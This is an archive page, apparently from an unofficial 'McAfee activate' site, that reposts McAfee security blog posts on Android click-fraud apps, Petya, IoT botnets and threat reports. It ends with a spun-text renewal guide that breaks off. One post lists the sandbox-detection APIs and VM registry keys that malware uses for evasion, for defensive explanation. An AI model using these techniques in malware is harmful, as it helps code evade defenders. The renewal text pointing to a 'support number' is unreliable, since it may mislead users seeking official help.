Category Archives: McAfee ePO antivirus

Android Click-Fraud Apps Briefly Return to Google Play

Click-fraud-1c
Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

Click-fraud apps frequently appear on Google Play and third-party markets. They are sometimes hard to identify because the malicious behavior that simulates clicks is similar to the behavior of many legitimate applications (using common API calls and permissions). Further, part of the malicious code does not reside in the original malware and comes from a control server. Using special methods to perform the clicking allows the attackers to decide when and how pursue their fraud.

The McAfee Mobile Malware Research Team recently found on Google Play a group of Android/Clickers published by the developer “TubeMate 2.2.9 SnapTube YouTube Downloader J.” Five apps were updated on Google Play on August 4 and were removed a few days later, along with the developer profile.

By checking “com.ggnegmth.app” on GooglePlay we saw something suspicious in this application: a nonsense name, no description, and poorly reviewed. Of course, those traits do not guarantee an app is malicious, but this lineup should serve as a warning for Android users looking for new apps.

 

Analyzing and reverse engineering this sample shows us a DeviceAdminReceiver class that connects to a hardcoded URL to obtain parameters that indicate how and where to perform click-fraud activities:

This function is part of a service initiated by a receiver related to DeviceAdmin.

Once the URL is requested, the control server returns an HTML page with the parameters in an uncommon way—inside the title tag, as we see in the following:

All the parameters are in one line, but the malware interprets them using the string “eindoejy” to separate them, obtaining the target URL, JavaScript functions to perform clicks, HTTP headers used in the fraudulent HTTP request, and another Google Play package to monetize the clicks in the abused ad network. We thought that string “eindoejy” could be an anagram of “I enjoyed” or “die enjoy,” but we found other variants in which the word used to split the parameters is different.

Once installed, Android/Clicker.BN adds an icon to the main menu that is not related to the downloaded app from Google Play. The new icon appears to be a system utility. Some examples of the icons loaded by the malware:

When Android/Clicker.BN executes, it requests device administration privileges:

Some of the apps can access YouTube inside a WebView and list trending channels, others lock and blacken the screen, and others crash the UI while in the background running click fraud—which not only harms advertisers and publishers, but also generates malicious traffic on infected devices, impacts battery and overall usage performance, and opens the door to new malicious payloads.

McAfee Mobile Security detects this threat as Android/Clicker.BN!Gen and prevents its execution. To further protect yourself against malicious apps, use only legitimate app stores, and pay attention to suspicious traits such as nonsense names, missing descriptions, and poor reviews. Also verify that the app’s request for permissions are related to its functionality. Be wary when apps request device administration API access, which is usually requested only by security apps, antimalware, mobile device management, or corporate email clients. Most apps and games will never ask for device admin rights.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

How to Protect Against Petya Ransomware in a McAfee Environment

McAfee_fight_against_ransomware
Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

A new variant of the ransomware Petya (also called Petrwrap) began spreading around the world on June 27. Petya is ransomware that exploits the vulnerability CVE-2017-0144 in Microsoft’s implementation of the Server Message Block protocol. This ransomware encrypts the master boot records of infected Windows computers, making the machines unusable.

The initial attack vector is unclear, but aggressive worm-like behavior helps spread the ransomware. (Read McAfee’s detailed technical analysis of the Petya ransomware.)

Microsoft released a set of critical patches on March 14 to remove the underlying vulnerability in supported versions of Windows, but many organizations may not yet have applied these patches.

How McAfee products can protect against Petya ransomware

As with WannaCry and other similar attacks, a layered, integrated cyber defense system that combines advanced analytics, threat intelligence, signatures, and human expertise is the best way to protect your business against emerging threats. McAfee’s collaborative cyber defense system leads the way for enterprises to protect against emerging threats such as Petya ransomware, remediate complex security issues, and enable business resilience. By empowering integrated security platforms with advanced malware analytics and threat intelligence, our system provides adaptable and continuous protection as a part of the threat defense life cycle.

Attacks like Petya and its future variants cannot win against a collaborative cybersecurity ecosystem that works as a team and empowers protective tools to make better decisions at the point of attack.

McAfee offers early protection for components of the initial Petya attack in the form of advanced malware behavior analysis with Real Protect Cloud and the brand-new Dynamic Neural Network (DNN) analysis techniques available in McAfee Advanced Threat Defense (ATD). ATD 4.0 introduced a new detection capability using a multilayered, back-propagation neural network (DNN) leveraging semisupervised learning. DNN looks at certain features exercised by a malware to come up with a positive or negative verdict to determine whether the code is malicious.

Whether in standalone mode or connected to McAfee endpoint or network sensors, ATD combines threat intelligence with sandbox behavior analysis and advanced machine learning to provide zero-day, adaptable protection. Real Protect, part of the Dynamic Endpoint solution, also uses machine learning and link analysis to protect against malware without signatures and provide rich intelligence to the Dynamic Endpoint and the rest of the McAfee ecosystem. Real Protect combined with Dynamic Application Containment provided early protection against Petya.

Multiple McAfee products provide additional protection to either contain the attack or prevent further execution. This post provides an overview of those protections with the following products:

McAfee Endpoint Security

Threat Prevention

  • McAfee Endpoint Security (ENS) with Global Threat Intelligence (GTI) and On Access Scan policy with the sensitivity level set to “Low” protect against known samples and variants. Learn more about recommended McAfee GTI file reputation settings in KB74983, with more information in KB53735.
  • McAfee Threat Intelligence Exchange (TIE) with GTI protect against known samples and variants.

Thus systems using McAfee ENS 10 are protected from known samples and variants with both signatures and Threat Intelligence.

Adaptive Threat Protection

  • Adaptive Threat Protection (ATP), with rule assignment configured in *Balanced mode” (Default in ATP\Options\Rule Assignment setting), will protect against both known and unknown variants of the Petya ransomware.
  • The ATP module protects against this unknown threat with several layers of advanced protection and containment:
    • ATP Real Protect Static uses client-side pre-execution behavioral analysis to monitor unknown malicious threats before they launch.
    • ATP Real Protect Cloud uses cloud-assisted machine learning to identify and clean the threat, as shown below:

  • ATP Dynamic Application Containment (DAC) successfully contains the threat and prevents any potential damage from occurring (DAC events noted below):

Advanced Threat Defense

  • McAfee Advanced Threat Defense (ATD) 4.0 with Deep Neural Network and Dynamic Sandbox identified the threat and proactively updated the cyber defense ecosystem

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

An Overview of Malware Self-Defense and Protection

McAfee-Central-wind8apps
Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

Many malware authors spend a great deal of time and effort to develop complex code. Their success depends on a threat’s remaining undetected and avoiding sandbox analysis, antivirus efforts, or malware analysts. This post offers an overview of the mechanisms used by malware to evade detection.

If malware is detected quickly, it has little time to steal data or to maximize its impact. The IT security market has matured and security tools and applications are today more efficient. However, attackers understand and monitor the operations of security tools. In addition, organizations do not always follow best practices. Antimalware tools are sometimes outdated, and sandboxes can easily be detected due to misconfiguration.

Malware self-defense

Malware can use several mechanisms to avoid detection and analysis. We can classify these techniques into three categories:

  • Anti-security tools: Used to avoid detection by antivirus, firewall, and other tools that protect the environment.
  • Anti-sandbox: Used to detect automatic analysis and avoid engines that report on the behavior of malware.
  • Anti-analyst: Used to detect and fool malware analysts. For example, spotting monitoring tools such as Process Explorer or Wireshark, as well as some process-monitoring tricks or packers, to avoid reverse engineering.

Some malware techniques are common to these three categories. Malware can use a technique like RunPE (which runs another process of itself in memory), to evade antivirus software, a sandbox or an analyst.

Sandbox evasion

Sandboxes are an effective tool to quickly detect and understand malware; however, it is relatively trivial for malware to detect a sandbox if it is not hardened. Malware can perform several basic checks:

  • MAC address detection: Virtual environments such as VMware or VirtualBox use known MAC addresses. This address is often stored in the registry at (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetworkAddress). The malware can detect this two ways, either by requesting the Hive key or using the GetAdapterInfo API.
    DWORD GetAdaptersInfo(
              _Out_   PIP_ADAPTER_INFO pAdapterInfo,
              _Inout_ PULONG                   pOutBufLen
    );
  • Process discovery: Malware may be able to detect whether there are any running processes related to a sandbox. For example, processes such as VmwareService.exe can be easily detected with the CreateToolHelp32Snapshot API, to get a snapshot of the current running processes, and then list each process of the snapshot with the APIs Process32First and Process32Next.
    HANDLE WINAPI CreateToolhelp32Snapshot(  
              _In_ DWORD dwFlags,  
              _In_ DWORD th32ProcessID
    );
    
    BOOL WINAPI Process32First(  
              _In_    HANDLE           hSnapshot,  
              _Inout_ LPPROCESSENTRY32 lppe
    );
    
    BOOL WINAPI Process32Next(  
              _In_  HANDLE           hSnapshot,  
              _Out_ LPPROCESSENTRY32 lppe
    );
  • Registry detection: Virtual environments create registry keys on the system that can be detected by malware. Following we see an incomplete list of the registry keys that malware can check:
    “HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0”
    “SOFTWARE\\VMware, Inc.\\VMware Tools”
    “HARDWARE\\Description\\System”
    “SOFTWARE\\Oracle\\VirtualBox Guest Additions”
    “SYSTEM\\ControlSet001\\Services\\Disk\\Enum”
    “HARDWARE\\ACPI\\DSDT\\VBOX__”
    “HARDWARE\\ACPI\\FADT\\VBOX__”
    “HARDWARE\\ACPI\\RSDT\\VBOX__”
    “SYSTEM\\ControlSet001\\Services\\VBoxGuest”
    “SYSTEM\\ControlSet001\\Services\\VBoxMouse”
    “SYSTEM\\ControlSet001\\Services\\VBoxService”
    “SYSTEM\\ControlSet001\\Services\\VBoxSF”
    “SYSTEM\\ControlSet001\\Services\\VBoxVideo”

Malware can also perform some advanced techniques to detect a sandbox:

  • Checking hook function: A hook is basically a technique to alter the behavior of an internal function of an operating system or an application. Sandboxes use hook techniques to alter the behavior of a sample; for example, by hooking the DeleteFile function, malware will try to delete a file that will be intercepted by the sandbox. These kinds of function are located in a specific place in memory (kernel land).

Malware can detect a hook by checking the address of the calling function. For example, if the returned address is not located in the kernel, the function is currently hooked.

Malware can use other techniques such as checking the size of the hard drive or using special instructions to detect specific registers (“Red Pill” or “No Pill” techniques). These techniques are based on the fact that registers are unique in a machine and have to be relocated on a virtual environment.

Antivirus evasion

Antivirus tools use three basic functions: signatures, scanner, heuristics.

  • Evading signatures can be performed by changing the hash of the sample, which is as easy as changing only one byte in the executable.
  • Evading a scanner can be performed by creating a big file to confuse the emulator.
  • Evading heuristic analysis is more complex, but can be performed by hooking back functions.

Another way to evade antivirus tools is for the malware to disable the tool or add an exception. Polymorphic codes are particularly difficult to detect.

Antidebugging

Malware analysts often have to dig deep during code analysis. Antidebugging is another malware technique for avoiding reverse engineering by a debugger. It is relatively trivial to detect the presence of a debugger using the Windows API.

  • IsDebuggerPresent: This function checks a specific flag in the process environment block for the field IsDebugged, which will return zero if the process is not running in a debugger or a nonzero if a debugger is attached.
    BOOL WINAPI IsDebuggerPresent(void);
  • FindWindow: This function can search for windows by name or class (for example, OllyDbg). This function can also detect tools such as Wireshark or Process Explorer.
    HWND WINAPI FindWindow(  
              _In_opt_ LPCTSTR lpClassName,  
              _In_opt_ LPCTSTR lpWindowName
    );
  • CsrGetProcessId: This function can find the process ID of csrss.exe, a system process. By default, a process has the SeDebugPrivilege privilege in the access token disabled. However, when the process is loaded by a debugger such as OllyDbg or WinDbg, the SeDebugPrivilege privilege is enabled. If a process can open csrss.exe, it means that the process has the privilege SeDebugPrivilege enabled in the access token, thus suggesting that the process is being debugged.

Anti-Disassembly

Anti-disassembly is another technique to avoid analysis through reverse engineering. There are many ways to hinder a disassembler:

  • API obfuscation can hide a call to a special function. The result could be a call without the name of the API function, for example. The analyst has to reverse it to understand which function was used. This takes time.
  • Inserting junk code: Junk code can be inserted into the malware to fool analysts into wasting time trying to reverse unusable code. The junk code does not change the behavior of the sample because this code is never executed.

The “Unprotect Project”

There are many ways to avoid malware analysis. Some open projects list these techniques. The Unprotect Project is an open wiki that collects and lists malware protection and self-defense techniques. The project includes a mind map that lists techniques for a better understanding of malware protection capabilities.

The goal of this project is to help the community better understand techniques used by malware to stay undetected, bypass security protection, and avoid analysis. The following categories appear on the website:

  • Sandbox evasion techniques: To evade sandboxes analysis.
  • Antivirus evasion techniques: To evade detection by antivirus.
  • Anti-debugging techniques: To fool debuggers and avoid analysis.
  • Anti-disassembly: To avoid reverse engineering and understand the behavior of malware with a disassembling tool.
  • Process tricks: To hide the malware processes on the system and stay undetected.
  • Obfuscation and data encoding: To hide data or part of code in the malware.
  • Packers: To protect malware code and add other evasion capabilities.

The wiki is updated continuously.

Conclusion

Malware is constantly growing smarter and evolving techniques to stay undetected. Understanding these techniques and sharing the experiences of the information security community are effective ways to fight malware.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

McAfee Customer Success Group Puts Customers at the Core

tech-support-customer-support
Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

To Our Valued Customers:

Allow me to introduce myself. I am Aneel Jaeel, the new leader of the McAfee Customer Success Group. With 25 years of industry experience, I’m excited about applying what I’ve learned to help transform our organization to bring you the best possible customer experience. I’d like to share our vision of customer success, which includes a new approach and a new flagship offering.

When it comes to protecting against breaches and other advanced threats, companies are facing big challenges—enterprise environments are more complex than ever before, the volume and sophistication of attacks is increasing at a rapid pace, and skilled staff are in short supply. There’s never enough time to keep up with new outbreaks, updates, and technology trends. With 1.8 million cybersecurity jobs going unfulfilled in 2017, building a top-notch team has never been more difficult. And threats are evolving rapidly, which means we need to proactively evolve our defenses.

As part of our transformation as a company, we pledge to dedicate ourselves to keeping the world safe from cyberthreats and to be your number one security partner. Our new Customer Success Group has aligned itself with that mission. We aim to put you, our customer, at the core to ensure that you get your desired outcomes from your McAfee solutions. With that goal always at the forefront, we are now providing holistic solutions that align Education Services, Professional Services, and Enterprise Support teams to help you achieve and maintain success throughout your entire threat defense lifecycle with us.

At MPOWER, we’ll be launching a new integrated offering—our flagship McAfee Premier Success Plan. We understand that acquiring the right solution is just the beginning. Equally important to a sound security strategy are decisions around design, deployment, maintenance, risk management, escalations, and education. Drawing from key services across our organization, we’ve created a simplified, all-in-one program focused on three outcomes. Through the McAfee Premier Success Plan, we’ll collaborate with you to more proactively plan and maintain your McAfee solutions, manage operational risk, and derive the full value of your security investment over time. Our comprehensive roadmap integrates professional services and solutions services, training, and technical support with personalized management.

We at the McAfee Customer Success Group believe in the principle that “Together is power.” When it comes to achieving digital safety and success, you are not alone.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit

McAfee_Labs_Threats_Report_Explores_Malware

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, one of which was Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

How to Secure the Future of the Internet of Things

McAfee_antivirus_internet_security

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

The world of security for the Internet of Things just became more complex. IoT devices are no longer a potential threat to their owners; now they pose a significant threat to everything connected to the Internet.

The old IoT security problem

For the past year, the cybersecurity and IoT communities have been at odds regarding how to keep devices from harming their owners. Much of the focus emerged around industrial controls and transportation equipment. Vulnerable industrial controls devices could cause cascading effects to power stations, water distribution, chemical plants, heavy machinery, and other industrial facilities, posing a threat to workers or downstream users. There have been hacks, compromises, and stern warnings. Concerned governments are putting pressure and establishing requirements to protect services at a national level.

Vehicles, most notably airplanes and smart cars, have taken the bulk of the public’s attention. Hacks against Jeep, Tesla, and Volkswagen have shown how doors can be unlocked and total operating control commandeered with steering, breaks, and acceleration taken over by an attacker. A car that is rendered unusable by its owner or made to crash and injure occupants is frightening but apparently trivial if you do not own that type of vehicle. The public appears to be entertained by these research exploits but not too concerned. The danger may seem beyond the everyday consumer and the effects are likely limited to only those who could afford such conveyances.

On the low-cost side, home appliances, wearables, toys, and drones are already a part of the everyday consumer world, but hacking a smart toaster or rice cooker seems harmless, beyond some burnt starch.

Eventually, we will face more risks than we can imagine. As IoT devices are woven into the fabric of people’s daily lives, we will be at risk of their misuse. In the future they will begin to control the stoplights on the way to work, the equipment in the emergency room, control of progressively more vehicles on the road and in the sky, and the distribution of such necessities such as electricity, food, medicine, water, and communications. We will begin to understand how these little technical minions become critical to the smooth delivery of services in our future digital lives.

This is the space where thought-leading IoT manufacturers are working feverishly. The automobile industry in particular has been quick to invest in security to ensure their products do not cause accidents. Such work has begun, but it still has a long way to go in cars and across all the other billions of devices we will weave into our lives and businesses in the next few years.

The next generation of IoT devices is appearing and will work to help protect our property, monitor our health, automate our homes, keep our children safe, increase our communication, eliminate time-wasting chores, make us more efficient, and optimize our businesses. A great future to be sure, but it will need to be trustworthy and secure, as our reliance on the smallest elements will ultimately impact the biggest parts of our lives. These are all known and accepted security challenges in the world of IoT. This is not the end of the security story, only the beginning.

iot5

The new IoT security problem

We now face a new set of problems with IoT. Unlike the known challenges, in which IoT devices might impact local owners and bystanders, the new threat is a powerful weapon that can be pointed at anything connected to the Internet. Recent distributed denial of service (DDoS) attacks have been fueled by hacked IoT devices, called bots. DDoS attacks saturate Internet-connected devices and services to bring them down or make them unavailable. Such attacks have been around for years, and in fact were some of the first types of Internet attacks; but the scale is now changing the game at a pace not tenable for security workarounds.

The game has changed. These IoT DDoS attacks are typically run by “bot herders.” These herders compromise devices and install malware that allows them to be remotely controlled. By pointing hundreds or thousands of devices to flood a target with requests and data, they can overwhelm it to the point it can no longer maintain functions. There are several anti-DDoS services that offer protection for a price. But the scale of the new IoT-backed attacks, which are larger than anything ever seen, makes protection difficult and costly. Josh Shaul, Akamai’s vice president of web security, warned that if such an attack were sustained, it could cost the victim millions of dollars in cybersecurity services to stay online.

Traditionally, PCs were the prime targets to turn into bots, as many people did not bother with installing antimalware products. But over the last few years, PCs have become much better protected and thus difficult for bot herders to consistently control. The other problem is the shift to laptops. A bot is good only if it is online, can receive instructions from its master, and then continuously execute those orders. Laptops do not fit this model well, as they spend much of their time off, to save battery life.

What bot herders really want is a massive number of devices that are easy to hack, are ignored by their owners, and are constantly connected to the Internet. Recent attacks have proven IoT devices are the perfect solution for cybercriminals.

The rise of IoT is a dream come true for bot herders. Most IoT devices are not powerful enough to have any type of antimalware service. A majority of consumer products come with a default login and password that are published by the manufacturer and easily found on the web. Many stay continuously connected to the Internet and users rarely monitor or update these devices, especially consumers. The biggest factor is around scale. Unlike the hundreds or thousands of PCs that might be in a herd, IoT botnets can number in the hundreds of thousands!

With legions of exploitable devices, attackers are mustering massive DDoS armies and the results of IoT botnets are devastating.

How to secure the future of IoT

The problem is not just what to do now, with the current exploits, but also how to protect the future. Attackers are using the most simple and easy path to take control, the default passwords. But they will adapt as controls come into play. This is the pattern we have seen with many other attack vectors. It is a repeating cycle in which attackers follow the path of least resistance to achieve their objective. IoT devices are just too perfect for botnets for the attackers to easily give up. This is shaping up to be a long and drawn-out fight.

securing-iot-devices

We must secure the future of IoT. This means blocking current exploits as well as interdicting the likely future maneuvers of attackers. This is what must be done to protect the life cycle of IoT devices, from inception to retirement.

  1. Designed and architected for security
    IoT manufacturers must take the time to embed security into the architecture, interfaces, and designs of their products. Basic security concepts and capabilities such as compartmentalization of data and code, communication between trusted parties, data protection both in use and at rest, and authentication of users should be established and tested. Products in the future will get more powerful, store more data, and possess more functionality. This means products should have the ability for security updates, feature locking, build validation, software vetting, and default configurations that follow industry best practices. It all starts with the manufacturer. Future proofing begins at the foundations. The hardware, firmware, operating systems, and software must be designed to go into a hostile environment and survive.
  1. Secure provisioning and configuration
    Most IoT devices require some kind of setup and provisioning upon installation. Device identity and authentication are a must, as part of this two-way process. Proper default configurations that adhere to best security practices are important and should be easy for users to understand. Rules should be in place that do not allow default passwords, require patches and updates to be signed, data to be encrypted, and only secure web connections. For enterprises, limiting network access, patching in a timely manner, and allowing only approved software to run will go a long way to keeping the devices secure. For gadgets that are capable, implementing security software such as antimalware, intrusion prevention systems, and even local firewalls will improve the device’s defense posture. Detection and telemetry should also be configured to detect when systems are under attack or are functioning in ways not intended by the organization. Policies must be established for privacy, data retention, remote access, key security, and revocation procedures.
  1. Proper administration and management
    For devices owned by consumers, it is imperative they alone maintain the final say in how the device is managed. Manufacturers and online service providers play a role in provisioning but the owner must retain ultimate control of what the device will do. Provisioning is different than administration. For example, during installation of home cameras it makes sense to connect to the manufacturer for the latest patches and maybe even setting up cloud storage. But you would not want your home cameras controlled by the manufacturer. They should not have the ability to operate them outside of buyer’s authority. Owners must retain the power to turn on or off their products and choose which online services they allow to connect. This requires proper user identification and authentication. As before, allowing a common default password is not good because anyone can take over as the administrator. Imagine if Windows came with a default login password for every system. It would create a security nightmare because many would never change it and attackers would login as users. So, first IoT systems must be able to authenticate their owners. Management functionality must also extend to empower the owner to set limits, data policies, and privacy parameters that are more restrictive than those of any potential third-party vendor. Signed security updates should be automatically installed by default as they become available. Savvy owners should be able to configure limits for inbound and outbound connections, data types, ports, and security settings. Logs that can be pushed to a trusted system or viewed locally should capture errors, and unexpected and unusual activities. A system for remote-warning notifications, via email or text, is a welcome feature on some devices. Finally, a reset capability must be present in the event of an unrecoverable compromise or transfer of ownership.

Enterprise and industrial devices are typically managed centrally, by the purchasing organization. This may be part or different than provisioning by the manufacturer or service provider. Entire classes, potentially numbering in the thousands, may be controlled to operate individually or as part of a collective. The same choices and control are required. Instead of a single owner, an organization’s employees will administer the IoT devices, monitor for issues, and respond to problems.

Proper administration and management is about oversight and final control by the device owner. It should be simple to understand and easy to manage. Devices should possess the necessary processes to determine if something is wrong, communicate such events to their owners, and provide options to resolve issues. IoT devices are here to make our world better and smarter; they themselves must bring some intellect to the ecosystem to protect themselves and work with their owners for their benefit.

How do we make IoT security a reality? 

Security and privacy take effort, resources, and commitment. To change from the status quo, we must hold manufacturers accountable for their devices. If they fail to design and architect security into their products, make them liable and stop buying their wares. For critical functions that could put the safety of people at risk, enact regulations and subject them to government penalties.

As part of the best practices, which manufacturers and service providers must follow, developers must institute the aspects that make provisioning and initial configuration secure by default. Industry consortiums are working to define best practices, configurations, and default settings for different device classes.

Last and perhaps most difficult, is to raise the level of awareness and involvement of users. It is their security and the operational availability of potential Internet targets that is at risk. Without some assistance from consumers and businesses, these controls will be easily undermined or neglected. Social interaction must take place. We all have a responsibility, as a digital community, to maintain reasonable hygiene for devices connecting to our common resource, the Internet.

The choice is ours

It may seem like a lot to consider, but remember attackers need only find a reasonable vulnerability to exploit. The opportunity is to make the effort challenging enough so they are not motivated to pursue these devices. We find ourselves in a situation in which billions of IoT products will flood every industry and quickly find their way into our homes, schools, governments, and businesses. We must make the necessary efforts to not bring vulnerabilities with them. The effects will go well beyond our own lives, data, and devices. They may be turned into legions of bots, which could cause havoc to even the biggest of organizations on the Internet. We could all become victims if we do not work together to make our future technology trustworthy, safe, and secure.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware

mcafee-antivirus-security

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

we published the McAfee Labs Threats Report: September 2017. This quarter’s report shows off a new design. We hope you will find it attractive as well as informative. The report contains three highly educational topics, in addition to the usual set of threats statistics:

  • Earlier this year, WannaCry malware infected more than 300,000 computers in over 150 countries in less than 24 hours. Several weeks later, the malware Petya exploited the same operating systems’ flaw along with multiple other techniques to spread to other computers on the same network. These attacks exposed among other lessons the continued use of old and unsupported operating systems in critical areas and they laid bare the lax patch-update processes followed by some businesses. We explore the timeline and background of the WannaCry attack and Petya, its apparent follow-up; the vulnerabilities they exploited; a technical analysis of their infiltration and propagation methods; and our thoughts on the motives for these attacks and what they might lead to.
  • Threat hunting is a growing and evolving capability in cybersecurity, one with a broad definition and wide range of goals, but it is generally seen as a proactive approach to finding attacks and compromised machines without waiting for alerts. Threat hunting enables security operations to study the behaviors of attackers and build more visibility into attack chains. This results in a more proactive stance for the security operations center, shifting the focus to earlier detection, faster reaction times, and enhanced risk mitigation. In May, McAfee surveyed more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations today and how they plan to enhance their threat hunting capabilities in the future. We offer detailed advice and recommendations for using certain types of indicators of compromise when hunting for threats.
  • Cyberattackers often use scripting techniques in their assaults. Some attacks employ script-based malware at every stage, while others use it for a specific purpose. Script-based malware—written in the JavaScript, VBS, PHP, or PowerShell scripting languages—has been on the upswing during the last two years for a very simple reason: evasion. Scripts are easy to obfuscate and thus are difficult for security technology to detect. In this Key Topic, we discuss why cybercriminals leverage script-based malware, how script-based malware propagates, the types of malware that use scripts for distribution, ways in which authors obfuscate script-based malware, and how to protect against script-based malware.

Accompanying the first and last Key Topic are Solution Briefs that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q2:

  • Malware: New malware samples leaped in Q2 to 52 million, a 67% increase. The total number of malware samples grew 23% in the past four quarters to almost 723 million samples.
  • Ransomware: New ransomware samples again increased sharply in Q2, by 54%. The number of total ransomware samples grew 47% in the past four quarters to 10.7 million samples.
  • Mobile malware: Global infections of mobile devices rose by 8%, led by Asia with 18%. Total mobile malware grew 61% in the past four quarters to 18.4 million samples.
  • Incidents: We counted 311 publicly disclosed security incidents in Q2, an increase of 3% over Q1. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q2 took place in the Americas.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

McAfee MOVE AntiVirus Multiplatform Deployment Just Got a Lot Easier

macafee-antivirus

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

McAfee Management for Optimized Virtual Environments AntiVirus (McAfee MOVE AntiVirus) optimizes security for virtual desktops and servers. Version 4.6 became available on July 18, 2017. One of the major enhancements offered by this release is dramatic simplification of the multiplatform deployment process. McAfee MOVE AntiVirus 4.6 automates the deployment of the Security Virtual Machine (SVM) Manager, SVM and clients, reducing manual clicks by 70%!

Here’s a quick walk through of the new streamlined deployment steps:

Step 1:  There’s now just one click installation of software extensions and product packages required so that you can install McAfee MOVE AntiVirus components on McAfee ePolicy Orchestrator (McAfee ePO) or deploy them to virtual systems. No more separate downloads.

Step 2:  Like in previous versions of  McAfee MOVE AntiVirus, you register your VMware vCenter account with McAfee ePO.

Step 3: Configuration and deployment

of the SVM Manager is now consolidated into one step using a single Meta Package.

Step 4:  You review your McAfee MOVE AntiVirus deployment status.

Step 5:  Next, you deploy the McAfee MOVE AntiVirus client. The McAfee MOVE AntiVirus client will automatically run the European Institute for Computer Antivirus Research (EICAR) test.  This means that you no longer need to log into the MOVE client and the MOVE SVM to check connection status and that you don’t need to run separate EICAR tests.

Step 6:  The SVM deployment will start automatically. Deployment of SVM load balancing is also automatic.

Error codes for all six steps are now automatically generated and displayed in the status during installation to make diagnosing issues much easier.

Learn More

McAfee MOVE AntiVirus 4.6 includes a number of additional enhancements, including the ability to block more threats in multiplatform deployments with improved threat intelligence. Check out the release notes for more details.

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

How To Renew Mcafee Antivirus Application – Step Wise Guide

mcafee-activation-guide

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

McAfee antivirus is one of the best and amazing antimalware program which you could make use to safeguard your information. It safeguards the information from viruses, malware, ransomware, spam ware, rootkits, Trojans, and a number of such risks. McAfee antivirus embodies some superior attributes right into it like Firewall, encryption software program, adult controls, spam administration, password remember, anti-spam, and also many more attributes. One of the very best components of this software program is that using a solitary subscription, you can mount it on a number of tools that you have. This, then, could be made use of to safeguard all your devices and safeguard your device from any hazards that you might discover.

McAfee Antivirus Renewal Support

In order to make use of McAfee antivirus, it is required to have a membership for the very same. McAfee antivirus is however readied to the choice of subscription renewal, yet sometimes, the subscription renewal attribute may be diminished. In such an instance it comes to be essential to renew McAfee antivirus to ensure that your system continues to be safeguarded at all times and do not drop a victim to the current security hazards.

There are a number of virus attacks accomplished on a daily basis which vary in their structure as well as their technique of working. In order to deal with such infections, the antivirus should be updated daily. McAfee updates have the infection definitions of the current safety hazards which help you secure from the current protection dangers.

To perform McAfee renewal process, it is required to perform the proper steps or you may also get in touch with McAfee Antivirus Technical Support Number.

Steps to Renew McAfee Antivirus:

If there is a situation when your McAfee antivirus membership has actually run out or is about to run out, you have to follow the steps mentioned below to efficiently renew your McAfee antivirus.

